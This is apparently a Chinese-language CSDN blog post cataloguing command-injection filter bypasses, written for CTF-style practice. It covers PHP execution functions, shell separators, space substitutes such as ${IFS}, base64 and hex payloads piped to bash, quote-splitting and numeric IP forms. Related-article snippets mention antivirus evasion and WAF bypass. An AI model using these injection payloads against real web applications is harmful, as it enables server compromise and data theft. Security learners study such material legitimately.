常见命令执行的一些绕过方式

最新推荐文章于 2024-04-30 09:56:59 发布
最新推荐文章于 2024-04-30 09:56:59 发布
阅读量6.1k 收藏 59
点赞数 8
分类专栏: 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/116152477
版权

文章目录

一、命令执行

1. php调用外部程序常用的函数:

system()—执行shell命令也就是向dos发送一条指令。
shell_exec() — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。
exec() —执行外部程序。
passthru() — 执行外部程序并且显示原始输出。
2. 造成命令执行的原因
代码过滤不严格–如使用system函数调用封装在二进制文件中的核心代码,如system("/bin/program --arg $arg");
系统的漏洞造成命令注入–bash破壳漏洞(CVE-2014-6271)
调用的第三方组件存在代码执行漏洞–WordPress(ImageMagick组件), JAVA(struts2),ThinkPHP命令执行
3.命令执行的危害
继承Web服务程序的权限去执行系统命令或读写文件
反弹shell
控制整个网站甚至控制服务器
进一步内网渗透

二、绕过技巧

1.常见管道符

windows:

‘|’ 直接执行后面的语句
‘||’ 如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
‘&’ 前面和后面命令都要执行,无论前面真假
&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

Linux:
Linux系统包含了windows系统上面四个之外,还多了一个 ‘;’ 这个作用和 ‘&’ 作用相同

2. 空格过滤

<  --  重定向,如cat<flag.php
<>      --   重定向,如cat<>flag.php
%09  --  需要php环境,如cat%09flag.php
${IFS}  --  单纯cat$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名,如cat${IFS2}flag.php
$IFS$9  --  后面加个$与{}类似,起截断作用,$9是当前系统shell进程第九个参数持有者,始终为空字符串,如cat$IFS2$9flag.php

3. 黑名单绕过

1,拼接 

a=c;b=at;c=flag;$a$b $c
a=c;b=at;c=heb;d=ic;ab{c}{d}

2,base64编码

echo MTIzCg==|base64 -d 其将会打印123
echo "Y2F0IC9mbGFn"|base64-d|bash ==>cat /flag

3,hex编码

echo "636174202f666c6167" | xxd -r -p|bash ==>cat /flag

单引号和双引号绕过

ca''t flag 或ca""t flag
ca''t te""st.php

反斜杠绕过

ca\t fl\ag
cat te\st.php

绕过ip中的句点

网络地址可以转换成数字地址,比如127.0.0.1可以转化为2130706433。
可以直接访问http://2130706433或者http://0x7F000001,这样就可以绕过.的ip过滤。
在线转换地址:数字转IP地址 IP地址转数字 域名转数字IP

数字转ip地址 ip地址转数字 域名转数字ip

4. 绕过长度限制

Linux中的>符号和>>符号>
1,通过>来创建文件

>flag.txt

2,通过>将命令结果存入文件中

echo "hello hacker" > flag.txt

3,>>符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容

echo "hello hacker" >> flag.txt

Linux中命令换行
在Linux中,当我们执行文件中的命令的时候,我们通过在没有写完的命令后面加\,可以将一条命令写在多行
比如一条命令cat flag可以如下表示
在这里插入图片描述
将命令一条一条输入一个文本中再执行

root@kali:~# echo "ca\\">cmd
root@kali:~# echo "t\\">>cmd
root@kali:~# echo " fl\\">>cmd
root@kali:~# echo "ag">>cmd
root@kali:~# cat cmd
ca\
t\
 fl\
ag
root@kali:~# sh cmd
this is your flag

5. ls命令

1. ls -a 列出文件下所有的文件,包括以“.“开头的隐藏文件(linux下文件隐藏文件是以.开头的,如果存在..代表存在着父目录)。
2. ls -l 列出文件的详细信息,如创建者,创建时间,文件的读写权限列表等等。
3. ls -F 在每一个文件的末尾加上一个字符说明该文件的类型。"@"表示符号链接、"|"表示FIFOS"/"表示目录、"="表示套接字。
4. ls -s 在每个文件的后面打印出文件的大小。 size(大小)
5. ls -t 按时间进行文件的排序 Time(时间)
6. ls -A 列出除了"."".."以外的文件。
7. ls -R 将目录下所有的子目录的文件都列出来,相当于我们编程中的“递归”实现
8. ls -L 列出文件的链接名。Link(链接)
9. ls -S 以文件的大小进行排序

6. 各种读文件命令

cat--由第一行开始显示内容,并将所有内容输出
tac--从最后一行倒序显示内容,并将所有内容输出
more-- 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head-- 只显示头几行
tail --只显示最后几行
nl --类似于cat -n,显示时输出行号
tailf-- 类似于tail -f
vim --使用vim工具打开文本
vi --使用vi打开文本cat 由第一行开始显示内容,并将所有内容输出

参考博客

H0ne
关注
  • 8
    点赞
  • 59
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WMIHACKER:绕过防病毒软件横向移动命令执行工具
03-18
简介:常见的WMIEXEC,PSEXEC工具执行命令是创建服务或调用Win32_Process.create,这些方法已被防病毒软件100%拦截,因此我们创建了WMIHACKER(绕过防病毒软件横向移动命令执行测试工具) (不需要445端口)。...
XWork绕过安全限制执行任意命令漏洞补丁
08-20
为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值: #_memberAccess['...
命令执行绕过总结
box
07-23 2226
命令执行绕过总结 Linux篇 命令拼接 a=who b=ami $a$b //输出whoami 常用字符使用 & 表示将任务置于后台执行 ; 多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块 && 只有在 && 左边的命令返回真(命令返回值 $? == 0),&&右边的命令才会被执行。 || 只有在 || 左边的命令返回假(命令返回值 $? == 1),
命令执行各种绕过总结
m0_64815693的博客
10-11 8544
最近做了题目很多都有命令执行的,这里给自己做一次总结,也给大家一个参考,有各种绕过,十分的详细哦
RCE漏洞总结及绕过---代码执行
最新发布
qq_46603839的博客
04-30 806
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
命令执行的一些绕过技巧
m0_55754984的博客
09-14 3404
① 空格过滤 空格可以用以下字符串代替: < 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 $IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,然而如果加一个{}就固定了变量名,同理在后面加个$可以起到截断的作用 ,但是为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 ② 一些命令分隔符 linux中:%0a
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 4381
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
五、Linux命令执行绕过技巧
黑日里不灭的light
11-07 503
Linux命令执行绕过指的是,你在进行web测试,已经拿到了找到了执行linux命令的地方,但是有过滤,比如输入ls会被过滤掉,但是l\s可能就不会过滤(l\s和ls一样同样能被执行
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 1953
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
深入了解SQL注入绕过waf和过滤机制
02-11
等价函数与命令也是一种绕过技术,例如使用等价的函数或命令来代替原始的函数或命令,以避免 WAF 的检测。使用特殊符号也是一种绕过技术,例如使用特殊符号来分隔 SQL 语句,以避免 WAF 的检测。 HTTP 参数控制也是...
第二节 文件上传-绕过MIME-Type验证-01
09-15
在Web安全中,MIME-Type验证绕过是一个常见的漏洞。黑客可以使用这种方法来上传恶意文件,并控制服务器。因此,Web应用需要对MIME-Type验证进行加强,并使用安全的文件上传机制来防止恶意文件上传。 菜刀连接是一种...
php中函数禁用绕过的原理与利用1
08-03
值得注意的是,某些不受`open_basedir`影响的函数,如命令执行函数`system`,可以用来绕过限制。我们还可以寻找替代函数,例如使用反引号(`)来执行命令,以达到类似`system`的效果。 在研究如何绕过`disable_...
第三节 文件上传-绕过黑名单验证-01
09-15
黑名单验证是文件上传安全的一种常见机制,本节内容将介绍基于文件后缀名验证、基于黑名单验证代码分析、Burpsuite 绕过黑名单验证和上传 Webshell 菜刀连接等知识点。 一、基于文件后缀名验证 文件上传安全的第一...
内网经验之绕过杀软之MOF的利用
11-25
为了绕过这些防护,攻击者可能需要不断调整MOF文件中的内容,测试不同的执行策略,比如改变触发条件,如按分钟或小时的特定时间点,或者利用notepad.exe这样的常见进程启动来触发MOF执行。 在示例代码中,可以看到...
121-利用加载器以及Python反序列化绕过AV.pdf
09-20
这样,我们就可以绕过杀软的检测,并执行任意的操作系统命令。 在这篇文章中,我们还介绍了几种常见的免杀技术,例如特征码修改、花指令免杀、加壳免杀、内存免杀等。这些技术可以帮助攻击者绕过杀软的检测,并实现...
cmd操作命令和linux命令大全收集
04-24
bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时) route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface arp ...
看一眼就学会的命令执行绕过小妙招
真正的大师,永远都怀着一颗学徒的心。
12-30 3210
文章目录前言简单介绍下漏洞执行漏洞:一、命令执行的利用二、有趣的点来了原版:小妙招版 前言 简单介绍下漏洞执行漏洞: 命令执行(Command Execution)漏洞即我们可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。更常见命令执行漏洞是发生在各种Web组件,包括Web容器、Web框架、CMS软件、安全组件等。 提示:以下是本篇文章正文内容,下面案例可供参考 一、命令执行的利用 在这.
命令执行漏洞各种绕过方式
m0re's blog
07-10 7235
本文目录前言命令执行漏洞绕过方式管道符windows中常见管道符linux中常见管道符空格过滤黑名单绕过通配符绕过内敛执行绕过编码绕过绕过长度限制`>`和`>>`两个符号的使用命令换行最后参考文章 前言 刚做了一道题,是有关命令执行漏洞的,里面过滤的内容比较多,一时间找不到头绪,所以学习一下关于命令执行漏洞的绕过方式,以便以后遇到不会像现在这样一点思路都没有。 命令执行漏洞绕过方式 管道符 windows中常见管道符 | 直接执行后面的语句 || 如果前面命令是错的那么就执行后面的语句
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3329
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
web命令执行常见绕过方式
07-10
常见的web命令执行绕过方式包括: 1. 输入过滤绕过:通过使用各种编码、特殊字符或绕过函数来绕过输入过滤机制,如使用URL编码、HTML编码、Unicode编码等。 2. 命令分隔符绕过:通过插入特殊字符或空格来绕过命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值